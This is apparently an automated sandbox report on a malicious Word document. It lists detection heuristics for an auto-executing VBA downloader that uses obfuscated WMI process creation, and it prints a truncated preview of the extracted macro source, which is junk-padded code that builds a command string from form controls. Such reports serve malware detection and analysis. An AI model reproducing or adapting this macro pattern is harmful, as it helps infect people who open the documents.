Risk Score: 322 (MALICIOUS)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample contains VBA macros that are auto-executed via the Document_Open subroutine. These macros utilize CreateObject to interact with WMI (Win32_Process.Create) to launch a process, indicating a downloader or dropper functionality. The obfuscation technique of splitting keywords like 'winmgmts' is also present. The overall intent is to execute a second-stage payload.
Heuristics (8)
- ClamAV: Doc.Downloader.Generic-7444821-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Generic-7444821-0
- VBA macros detected [medium, 5 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- VBA WMI Win32_Process launcher [critical] OLE_VBA_WMI_PROCESS_CREATE: VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- Dangerous API name reassembled from split string literals [critical] OLE_VBA_SPLIT_KEYWORD_OBFUSCATION: VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
- Document_Open macro [high] OLE_VBA_DOCOPEN: Document_Open macro
- CreateObject call [high] OLE_VBA_CREATEOBJ: CreateObject call
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7717 bytes | 9f45d91b112f636f0c228006fe08c37ae4140a8042637318e1af84b4433b9dc1 |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Wagztsjfd"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Qwwetdrcvp, 0, 0, MSForms, TextBox"
Private Sub Document_open()
For Tfmpmgdfzndpn = Ioivjrbhyvl To 0
Bqxnsxgql = (13 - Atn(51) - (44 + Round(41) * Kmmigzlogio / CInt(1)))
Select Case Vkgryotalyei
Case Wpqzxwrlxfs
Kxovmbdriqosx = CLng(Yniaqioypir)
Knbzxpjc = Oct(Rgmyoybh)
Case Amjwsjqvyzmuj
Uopuioock = Dkzznbrucxde
Yodxqxxmrtk = Int(29)
End Select
Next
For Riftpzocldpxh = Ogzliteb To 0
Iqeijpoe = (13 - Atn(51) - (44 + Round(41) * Avmpnmmbntn / CInt(1)))
Select Case Csqoaqdmgk
Case Ikubnaszc
Ujxwhcocntgb = CLng(Boneetltifbs)
Svpibzwfcuwjs = Oct(Ncieimmeu)
Case Haasupcpj
Xaqwvlti = Dovctorm
Vkuswekzhgc = Int(29)
End Select
Next
For Qqfvvtyjok = Mtvfnzsip To 0
Ehgpswpck = (13 - Atn(51) - (44 + Round(41) * Vjuwowhow / CInt(1)))
Select Case Hommtjyohu
Case Bnpdfnziwv
Mkrkvbbcyuzsc = CLng(Gdwfkezt)
Scbxanlgoaisn = Oct(Tolgnwbzk)
Case Zqwtmrik
Zfyhologuopez = Omudqcrdvnv
Nrjdohtimzzl = Int(29)
End Select
Next
Bscznrplehwjd
End Sub
Attribute VB_Name = "Pqjdkknby"
Attribute VB_Base = "0{2C22C4B7-4639-4BBE-9D78-D3676BB828F5}{35E6C8EC-C98F-4AC0-A94C-C0B029C89273}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Emvyafspae"
Function Efnjmzodrx()
For Doirohma = Ogjlnxflfy To 0
Xcfrzedpcsps = (13 - Atn(51) - (44 + Round(41) * Rkrrtvfhejaat / CInt(1)))
Select Case Rjwgkqglwhi
Case Gvqqpogu
Fznqxvqylya = CLng(Tmlilyvjlz)
Jtklezuy = Oct(Hwaiqgjxxcv)
Case Eeguwxetzkpoc
Gzfmncfohch = Nbaewvgh
Yaqxhmlu = Int(29)
End Select
Next
Wibplufxkts = Wagztsjfd.Qwwetdrcvp
For Vgkppmzpxvlgd = Oynhnwkh To 0
Abtrdrbln = (13 - Atn(51) - (44 + Round(41) * Kdkwvpsy / CInt(1)))
Select Case Llhivxhcck
Case Iolgytdju
Yeuckrhsiju = CLng(Lihuujkwedv)
Pryvksvvie = Oct(Wkvrqwoyvupm)
Case Lesuazgycpu
Cuudegaxypfng = Pucmlvgqdodbn
Fxcxmdbrkf = Int(29)
End Select
Next
Oylgtquhlqijx = Wibplufxkts + Pqjdkknby.Eslptoofve + Pqjdkknby.Wlfyexcmzlicu + Pqjdkknby.Tuqcssvzezdro
For Jorsjreud = Fglwvkkzlp To 0
Xncrpwkuqepij = (13 - Atn(51) - (44 + Round(41) * Mstvqdlvso / CInt(1)))
Select Case Pxslrnque
Case Oxtgtbqdngxyg
Ftlrjdlouxxt = CLng(Suiftfxwxsub)
Brymtxiximx = Oct(Jyivhtiu)
Case Snmwjwsxirt
Ylzzlvmv = Bnxoxmicwpbgy
Zapppejx = Int(29)
End Select
Next
Aowtcdjn = Oylgtquhlqijx + Pqjdkknby.Zqahvjkbqcjxh + Pqjdkknby.Ispriflbv.ControlTipText
For Dcgphmqo = Smrejfzeomyd To 0
Uausunlcbo = (13 - Atn(51) - (44 + Round(41) * Lccqrssohucsv / CInt(1)))
Select Case Unpbzwvug
Case Tfiqkdqmtwbyv
Qeaybwegro = CLng(Oaqivyszmf)
Yciwktptvn = Oct(Uiqbozrbyqb)
Case Ofzchzkn
Zoivxzsrauznn = Knooliavswn
Oouddjqnfdt = Int(29)
End Select
Next
Efnjmzodrx = Dlrdginaylgh + Aowtcdjn + Dlrdginaylgh
For Lbrmlzjpek = Nmkgehzx To 0
Vsxlufobvgilc = (13 - Atn(51) - (44 + Round(41) * Ecaycyrqytm / CInt(1)))
Select Case Yglxkmfyozed
Case Ooscjtpa
Zyzeczsiatcpu = CLng(Qlspdvua)
Cfrckeyb = Oct(Mnbwphwdhazth)
Case Ixkbeexdbzua
Odohmndkwaw = Tudixpjchnzi
Jzwugrmtwll = Int(29)
End Select
Next
End Function
Function Bscznrplehwjd()
For Lntjuhtlfnruk = Xpexedzgot To 0
Ktpksdp
... (truncated)